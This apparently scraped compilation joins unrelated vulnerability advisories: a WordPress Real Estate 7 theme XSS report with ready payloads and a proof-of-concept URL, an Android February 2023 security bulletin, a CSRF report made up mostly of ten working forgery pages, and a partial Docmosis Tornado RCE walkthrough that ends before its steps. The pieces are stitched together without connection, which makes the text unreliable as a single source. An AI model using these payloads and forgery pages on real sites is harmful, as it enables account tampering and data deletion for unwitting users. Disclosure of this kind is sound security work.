WordPress Real Estate 7 Theme versions 3.3.4 and below suffer from a cross site scripting vulnerability.

    ==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)Google Dork:         inurl:/wp-content/themes/realestate-7/Research Date:       2023-02-10Researcher:          FearZzZz [ https://fearzzzz.ru ]Component Vendor:    Contempo Themes [ https://contempothemes.com ]Vulnerable Version:  <= 3.3.4Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778CVSS Base Score:     6.1 (Medium)CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NOWASP Top 10:        A7: Cross-Site Scripting (XSS)CWE:                 CWE-79CVE:                 TBA=================================================================================================#### [ Description: ]The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.#### [ Impact: ]Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.#### [ Payloads: ]```<img src=x onerror=(alert)(`FearZzZz`);>``````<svg/onload=alert(`FearZzZz`)>```#### [ Proof-of-Concept: ]https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3EGET /?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E HTTP/2Host: elementor3.contempothemes.com#### [ Timeline: ]2023.02.08 - Real Estate 7 Theme v3.3.4 released.2023.02.10 - Vulnerability has been discovered.2023.02.13 - Vendor notified, received a quick response.2023.02.13 - Real Estate 7 Theme v3.3.5 released, the vulnerability has been fixed.#### [ Contacts: ]Website:   fearzzzz.ruEmail:     fearzzzz@tutanota.comTwitter:   https://twitter.com/fear_zzzzMedium:    https://fearzzzz.medium.comGitHub:    https://github.com/fearzzzzYouTube:   https://youtube.com/@fearzzzz#### [ Notes: ]Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.#### [ Disclaimer: ]The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.========================================================================== [ www.fearzzzz.ru ] ==

WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting

In addAutomaticZenRule of ZenModeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242537431

_Published February 6, 2023 | Updated February 8, 2023_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2023-02-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a high security vulnerability in the Framework component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2023-02-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-02-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-27059

A-159249069

EoP

High

12, 12L

CVE-2022-20443

A-194480991 \[2\]

EoP

High

11, 12, 12L

CVE-2022-20551

A-243376549

EoP

High

12, 12L, 13

CVE-2023-20934

A-258672042 \[2\]

EoP

High

12, 12L, 13

CVE-2023-20942

A-258021433

EoP

High

12, 12L, 13

CVE-2023-20943

A-240267890

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20944

A-244154558

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20948

A-230630526

ID

High

12, 12L, 13

**Media Framework**

The vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20933

A-245860753

EoP

High

10, 11, 12, 12L, 13

**System**

The most severe vulnerability in this section could lead to remote code execution with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-43680

A-255449293

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20939

A-243362981

EoP

High

12, 12L, 13

CVE-2023-20940

A-256237041

EoP

High

13

CVE-2023-20945

A-246932269

EoP

High

10

CVE-2023-20946

A-244423101

EoP

High

11, 12, 12L, 13

CVE-2022-20481

A-241927115

ID

High

10, 11, 12, 12L, 13

CVE-2023-20932

A-248251018

ID

High

10, 11, 12, 12L, 13

CVE-2022-20455

A-242537431 \[2\] \[3\] \[4\] \[5\]

DoS

High

10, 11, 12, 12L, 13

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Subcomponent

CVE

WiFi

CVE-2022-20481

**2023-02-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-02-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Subcomponent

CVE-2022-39189

A-245869446  
Upstream kernel

EoP

High

KVM

CVE-2022-39842

A-245928838  
Upstream kernel

EoP

High

Video

CVE-2022-41222

A-248354871  
Upstream kernel

EoP

High

Kernel memory subsystem

CVE-2023-20937

A-257443051  
Upstream kernel \[2\] \[3\] \[4\] \[5\] \[6\] \[7\]

EoP

High

Memory Management

CVE-2023-20938

A-257685302  
Upstream kernel \[2\] \[3\] \[4\] \[5\] \[6\]

EoP

High

Binder

CVE-2022-0850

A-245406696  
Upstream kernel

ID

High

ext4

**MediaTek components**

This vulnerability affects MediaTek components and further details are available directly from MediaTek. The severity assessment of this issue is provided directly by MediaTek.

    

CVE

References

Severity

Subcomponent

CVE-2023-20602  

A-261367136  
M-ALPS07494107 \*

High

ged

**Unisoc components**

These vulnerabilities affect Unisoc components and further details are available directly from Unisoc. The severity assessment of these issues is provided directly by Unisoc.

    

CVE

References

Severity

Subcomponent

CVE-2022-47331  

A-262503737  
U-1946329 \*

High

Kernel

CVE-2022-47339  

A-262503731  
U-2029419 \*

High

Android

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Subcomponent

CVE-2022-33243  

A-245402502  
QC-CR#3217329

Critical

Kernel

CVE-2022-33280  

A-250627584  
QC-CR#3040964 \[2\] \[3\]

Critical

Bluetooth

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Subcomponent

CVE-2022-33232  

A-240972480 \*

Critical

Closed-source component

CVE-2022-40514  

A-258057252 \*

Critical

Closed-source component

CVE-2022-33221  

A-240972893 \*

High

Closed-source component

CVE-2022-33233  

A-240972514 \*

High

Closed-source component

CVE-2022-33248  

A-240972595 \*

High

Closed-source component

CVE-2022-33271  

A-258057374 \*

High

Closed-source component

CVE-2022-33277  

A-258057281 \*

High

Closed-source component

CVE-2022-33306  

A-258057409 \*

High

Closed-source component

CVE-2022-34145  

A-258057258 \*

High

Closed-source component

CVE-2022-34146  

A-258057317 \*

High

Closed-source component

CVE-2022-40502  

A-258057203 \*

High

Closed-source component

CVE-2022-40512  

A-258057239 \*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2023-02-01 or later address all issues associated with the 2023-02-01 security patch level.
*   Security patch levels of 2023-02-05 or later address all issues associated with the 2023-02-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-02-01\]
*   \[ro.build.version.security\_patch\]:\[2023-02-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-02-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2023-02-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2023-02-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

February 6, 2023

Bulletin Published

1.1

February 8, 2023

Bulletin revised to include AOSP links

CVE-2022-20455: Android Security Bulletin—February 2023

WordPress Real Estate 7 Theme versions 3.3.4 and below suffer from multiple cross site request forgery vulnerabilities.

==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==

Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Multiple Cross-Site Request Forgery (CSRF) Vulnerabilities  
Google Dork:         inurl:/wp-content/themes/realestate-7/  
Research Date:       2023-02-10  
Researcher:          FearZzZz [ https://fearzzzz.ru ]  
Component Vendor:    Contempo Themes [ https://contempothemes.com ]  
Vulnerable Version:  <= 3.3.4  
Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778  
CVSS Base Score:     6.3 (Medium)  
CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L  
OWASP Top 10:        A01: 2021 – Broken Access Control  
CWE:                 CWE-352  
CVE:                 TBA

=================================================================================================

#### [ Description: ]

The Real Estate 7 theme for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, v3.3.4, because of missing and incorrect nonce validation on several functions. This vulnerability could allow an attacker to trick users into performing an action they didn't intend to perform under their current authentication.

#### [ Impact: ]

Impact of a CSRF vulnerability is related to the privileges of the target user. Depending on the nature of the action, an attacker might be able to change some data or gain full control over the user's account. If the compromised user has a privileged role (administrator, i.e.) within the application, then the attacker can gain full control over the application.

#### [ Proof-of-Concept | Lead Alert Creation: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="ct_email_cron_onoff" />  
      <input type="hidden" name="esetting" value="onsms" />  
      <input type="hidden" name="id" value="12" />  
      <input type="hidden" name="author_id" value="22" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Add Property to Favorites: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/our-properties/our-exclusive-listings/">  
      <input type="hidden" name="wpfpaction" value="add" />  
      <input type="hidden" name="postid" value="1005" />  
      <input type="hidden" name="ajax" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Remove Property from Favorites: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/favorite-listings/">  
      <input type="hidden" name="wpfpaction" value="remove" />  
      <input type="hidden" name="page" value="1" />  
      <input type="hidden" name="postid" value="451" />  
      <input type="hidden" name="ajax" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Contact / Information Request: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-favorites.php" method="POST">  
      <input type="hidden" name="ctsubject" value="Fear is Big Business" />  
      <input type="hidden" name="name" value="FearZzZz" />  
      <input type="hidden" name="email" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="ctphone" value="no" />  
      <input type="hidden" name="message" value="Fear is Big Business" />  
      <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="ctproperty" value="https://fearzzzz.ru" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-content/themes/realestate-7/includes/ajax-submit-listings.php" method="POST">  
      <input type="hidden" name="listing_id" value="451" />  
      <input type="hidden" name="ctsubject" value="Fear is Big Business" />  
      <input type="hidden" name="name" value="FearZzZz" />  
      <input type="hidden" name="email" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="ctphone" value="" />  
      <input type="hidden" name="message" value="Fear is Big Business" />  
      <input type="hidden" name="ctyouremail" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="ctproperty" value="Z" />  
      <input type="hidden" name="ctlistingstreet" value="Z" />  
      <input type="hidden" name="ctlistingcity" value="Z" />  
      <input type="hidden" name="ctlistingstate" value="Z" />  
      <input type="hidden" name="ctlistingzip" value="Z" />  
      <input type="hidden" name="ctpermalink" value="https://fearzzzz.ru" />  
      <input type="hidden" name="ctlistingprice" value="Z" />  
      <input type="hidden" name="ctlistingsqft" value="Z" />  
      <input type="hidden" name="ctlistingbeds" value="" />  
      <input type="hidden" name="ctlistingbaths" value="" />  
      <input type="hidden" name="ctlistinglotsize" value="" />  
      <input type="hidden" name="ctlistingmlsnumber" value="" />  
      <input type="hidden" name="ctlistingpropertytype" value="Detached" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Lead Alert Deletion: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="ct_delete_search" />  
      <input type="hidden" name="property_id" value="12" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Profile Image Deletion: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="ct_ajax_delete_profile_img" />  
      <input type="hidden" name="id" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Broker Logo Deletion: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/wp-admin/admin-ajax.php" method="POST">  
      <input type="hidden" name="action" value="ct_ajax_delete_broker_logo" />  
      <input type="hidden" name="id" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Clear All Favorites: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/favorite-listings/">  
      <input type="hidden" name="wpfpaction" value="clear" />  
      <input type="hidden" name="ajax" value="1" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Buyer Profile Update: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="https://fearzzzz.ru/account-settings/" method="POST" enctype="multipart/form-data">  
      <input type="hidden" name="first_name" value="" />  
      <input type="hidden" name="last_name" value="" />  
      <input type="hidden" name="nickname" value="fearzzzz" />  
      <input type="hidden" name="display_name" value="FearZzZz" />  
      <input type="hidden" name="email" value="fearzzzz@tutanota.com" />  
      <input type="hidden" name="user_url" value="" />  
      <input type="hidden" name="description" value="" />  
      <input type="hidden" name="pass1" value="" />  
      <input type="hidden" name="pass2" value="" />  
      <input type="hidden" name="twitterhandle" value="" />  
      <input type="hidden" name="facebookurl" value="" />  
      <input type="hidden" name="instagramurl" value="" />  
      <input type="hidden" name="linkedinurl" value="" />  
      <input type="hidden" name="youtubeurl" value="" />  
      <input type="hidden" name="mobile" value="" />  
      <input type="hidden" name="user_additional_phone_1" value="" />  
      <input type="hidden" name="user_additional_phone_2" value="" />  
      <input type="hidden" name="user_mailing_address" value="" />  
      <input type="hidden" name="updateuser" value="Update Profile" />  
      <input type="hidden" name="_wpnonce" value="0451" />  
      <input type="hidden" name="_wp_http_referer" value="/account-settings/" />  
      <input type="hidden" name="action" value="update-user" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>  
```

#### [ Proof-of-Concept | Agent Profile Update: ]

```  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <script>  
      function submitRequest()  
      {  
        var xhr = new XMLHttpRequest();  
        xhr.open("POST", "https:\/\/fearzzzz.ru\/account-settings\/", true);  
        xhr.setRequestHeader("content-type", "multipart\/form-data; boundary=---------------------------333499251812319952534005853646");  
        xhr.withCredentials = true;  
        var body = "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"first_name\"\r\n" +   
          "\r\n" +   
          "Agent\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"last_name\"\r\n" +   
          "\r\n" +   
          "Demo\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"nickname\"\r\n" +   
          "\r\n" +   
          "agent\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"display_name\"\r\n" +   
          "\r\n" +   
          "Demo Agent\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"email\"\r\n" +   
          "\r\n" +   
          "agent@email.com\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"user_url\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"description\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"pass1\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"pass2\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"twitterhandle\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"facebookurl\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"instagramurl\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"linkedinurl\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"youtubeurl\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +   
          "\r\n" +   
          "1024000\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"ct_profile_img\"; filename=\"fearzzzz.jpg\"\r\n" +   
          "Content-Type: image/jpeg\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"mobile\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"user_additional_phone_1\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"user_additional_phone_2\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"user_mailing_address\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"fax\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"title\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"tagline\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"agentlicense\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +   
          "\r\n" +   
          "1024000\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"ct_broker_logo\"; filename=\"fearzzzz.jpg\"\r\n" +   
          "Content-Type: image/jpeg\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"brokeragename\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"brokeragelicense\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"office\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"address\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"city\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"state\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"postalcode\"\r\n" +   
          "\r\n" +   
          "\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"updateuser\"\r\n" +   
          "\r\n" +   
          "Update Profile\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +   
          "\r\n" +   
          "0451\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +   
          "\r\n" +   
          "/account-settings/\r\n" +   
          "-----------------------------333499251812319952534005853646\r\n" +   
          "Content-Disposition: form-data; name=\"action\"\r\n" +   
          "\r\n" +   
          "update-user\r\n" +   
          "-----------------------------333499251812319952534005853646--\r\n";  
        var aBody = new Uint8Array(body.length);  
        for (var i = 0; i < aBody.length; i++)  
          aBody[i] = body.charCodeAt(i);   
        xhr.send(new Blob([aBody]));  
      }  
    </script>  
    <form action="#">  
      <input type="button" value="Submit request" onclick="submitRequest();" />  
    </form>  
  </body>  
</html>  
```

#### [ Timeline: ]

2023.02.08 - Real Estate 7 Theme v3.3.4 released.  
2023.02.10 - Vulnerability has been discovered.  
2023.02.15 - Vendor notified.  
2023.02.16 - Chris Robinson responded that the vulnerabilities have been fixed. The release of the new version v3.3.5 is scheduled for March 6.

#### [ Contacts: ]

Website:   fearzzzz.ru  
Email:     fearzzzz@tutanota.com  
Twitter:   https://twitter.com/fear_zzzz  
Medium:    https://fearzzzz.medium.com  
GitHub:    https://github.com/fearzzzz  
YouTube:   https://youtube.com/@fearzzzz

#### [ Notes: ]

Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.

#### [ Disclaimer: ]

The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.

========================================================================== [ www.fearzzzz.ru ] ==

WordPress Real Estate 7 Theme 3.3.4 Cross Site Request Forgery

An issue was discovered in Docmosis Tornado prior to version 2.9.5. An authenticated attacker can change the Office directory setting pointing to an arbitrary remote network path. This triggers the execution of the soffice binary under the attackers control leading to arbitrary remote code execution (RCE).

Recently, I did a non-exhaustive security product review on a Document Generator Engine, named **Docmosis**. A system I targeted used **Docmosis Tornado** in its latest version **2.9.4**. I’ll give you a walkthrough based on my local lab installation with a Proof-of-Concept exploitation on an on-premises system belonging to a specialized agency of the United Nations.

By default, no login is needed to access the web UI :-0. But as we’ll see, even if the password protection is enabled/configured, there is an **Authentication Bypass** which makes all these findings exploitable from an **unauthenticated context** as well. But let’s go through all the findings step by step.

**Remote Code Execution**

This first vulnerability relies on the fact that the web UI field **“Open/Libre Office location”** can be changed, pointing to the _LibreOffice_ installation directory. All configuration changes are persisted after the corresponding _GWT-based_ HTTP POST request is sent to /webserverdownload/configure. The corresponding URL mapping can be found in the web descriptor web.xml.

    <servlet-mapping>
      <servlet-name>ConfigurationServlet</servlet-name>
      <url-pattern>/webserverdownload/configure</url-pattern>
    </servlet-mapping>
    ...
    <servlet>
      <servlet-name>ConfigurationServlet</servlet-name>
      <servlet-class>com.docmosis.webserver.server.ConfigurationServiceImpl</servlet-class>
    </servlet>
    

The responsible Java interface extends com.google.gwt.user.server.rpc.RemoteServiceServlet, finally leading to the implementing class com.docmosis.webserver.server.ConfigurationServiceImpl. The method com.docmosis.webserver.server.ConfigurationServiceImpl.saveConfiguration(ConfigBean) is called then with the parameters given in the request. There exists a validation method com.docmosis.webserver.server.ConfigurationServiceImpl.serverSideValidate(ConfigBean) which checks access to the Office location directory.

    String[] expectedFolders = DMProperties.getStringArray("docmosis.openoffice.location.binary.searchpath", ";");
    boolean subFolderFound = false;
    for (String expected : expectedFolders) {
      File subFolder = new File(officePathFile, expected);
      if (subFolder.canRead() && subFolder.isDirectory()) {
        subFolderFound = true;
        
        break;
      } 
    } 
    

The expectedFolders member seems to be used to check for expected folders matching a valid Office installation. The same is done for the Template directories etc. No further validations with respect to security are done. On a standard Windows installation, an **UNC network share path** could be used to point the Office directory to a remote host. The Office executable soffice.exe is used for converter functions etc. and therefore is observable in the process tree of Docmosis Tornado after being started.

Now, changing the **Open/Libre Office location** value to a remote network share path allows to load an **arbitrary malicious .exe file** named soffice.exe instead. After a restart of Docmosis Tornado, this would be fetched and executed, allowing an attacker to executing arbitrary code on the targeted machine. This already is a critical vulnerability in itself but **requires user interaction** on the server-side for the _restart_. **The web UI does not provide any restart functions**. Looking again at the GWT service implementation, we find the method com.docmosis.webserver.server.ConfigurationServiceImpl.restartServer() which indeed allows exactly this via a properly crafted GWT HTTP request. This makes the **user interaction restriction obsolete**. To following steps have to be taken to prove the Remote Code Execution (RCE).

